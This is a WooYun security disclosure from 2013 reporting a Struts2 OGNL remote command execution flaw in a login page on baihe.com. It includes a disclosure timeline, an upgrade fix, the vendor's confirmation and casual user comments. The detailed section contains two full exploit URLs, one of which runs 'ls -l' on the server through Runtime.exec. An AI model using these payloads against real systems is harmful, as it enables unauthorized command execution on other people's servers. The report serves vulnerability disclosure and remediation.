当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021392

漏洞标题:百合网某系统远程命令执行

相关厂商:百合网

漏洞作者: leaf

提交时间:2013-04-08 15:04

修复时间:2013-05-23 15:05

公开时间:2013-05-23 15:05

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-08: 细节已通知厂商并且等待厂商处理中
2013-04-08: 厂商已经确认,细节仅向厂商公开
2013-04-18: 细节向核心白帽子及相关领域专家公开
2013-04-28: 细节向普通白帽子公开
2013-05-08: 细节向实习白帽子公开
2013-05-23: 细节向公众公开

简要描述:

百合网某系统远程命令执行!

详细说明:

Struts2远程命令执行漏洞:

http://coop.baihe.com/login.action


简单测试下--输出"wooyun":

http://coop.baihe.com/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(d))&('\u0023c')(('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(c))&(asdf)(('\u0023rp\u003d@org.apache.struts2.ServletActionContext@getResponse()')(c))&(fgd)(('\u0023rp.getWriter().print("woo")')(d))&(fgd)(('\u0023rp.getWriter().print("yun")')(d))&(grgr)(('\u0023rp.getWriter().close()')(d))=1


11.jpg


列出当前目录:

http://coop.baihe.com/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))


22.jpg


...
...
...
and so on!!!

漏洞证明:

如上所述!

修复方案:

[1]下载最新的版本2.3.4:http://struts.apache.org/download.cgi#struts234
[2]或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。

版权声明:转载请注明来源 leaf@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-04-08 17:17

厂商回复:

leaf还是很专业的,谢谢对我们的关注,我们会及时处理的。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-08 15:34 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    百合说这很简单的。

  2. 2013-04-08 16:04 | clzzy ( 普通白帽子 | Rank:176 漏洞数:18 )

    怕死不革命,前排广告位招租!

  3. 2013-04-08 16:05 | 小葵 ( 实习白帽子 | Rank:84 漏洞数:9 | 我们是害虫,我们是害虫!)

    = = 很简单。。。

  4. 2013-04-08 16:10 | charles ( 路人 | Rank:6 漏洞数:4 | 研究web安全,0day,漏洞挖掘,关注国内安全动...)

    前几天有个大学生说百合很安全.MD百合就这样还安全?

  5. 2013-04-08 16:18 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    我中午看了“非你莫属”的那一期节目...

  6. 2013-04-08 16:32 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    慕岩在节目里对那个人说的是“你没测出来么?其实还是有的”。。

  7. 2013-04-08 16:39 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @gainover 确实是这么个说法...

  8. 2013-04-08 16:52 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @gainover 哈哈~慕岩的综合实力还是很高的额。他还真是啥都懂的~

  9. 2013-04-08 16:56 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    慕岩...莫言 ...音好近...

  10. 2013-04-08 17:21 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @leaf 跟柳岩近不近?大咪咪柳岩。。。?

  11. 2013-04-08 18:50 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    这让8K的同学情何以堪

  12. 2013-04-08 19:24 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @小胖子 汗!

  13. 2013-04-09 09:31 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    看来乌云同学的身价都超过了8k

  14. 2013-04-09 09:34 | 裙下的秘密 ( 实习白帽子 | Rank:83 漏洞数:9 | )

    @小胖子 你还别说听到慕岩这个名字我想到的是柳岩 -。-

  15. 2013-04-09 10:19 | Croxy ( 普通白帽子 | Rank:513 漏洞数:52 | 只会送人头)

    其实幕慕岩在乌云是有ID的•﹏•

  16. 2013-04-09 11:46 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @裙下的秘密 我们俩都是真屌丝。。。

  17. 2013-04-09 12:15 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    @Croxy 说不定他还是核心白帽子:)

  18. 2013-04-09 13:18 | 裙下的秘密 ( 实习白帽子 | Rank:83 漏洞数:9 | )

    @小胖子 估计是那,只有屌丝才能心意相通 -。-

  19. 2013-04-09 15:10 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    sangfor.....

  20. 2013-05-08 17:54 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    顶慕岩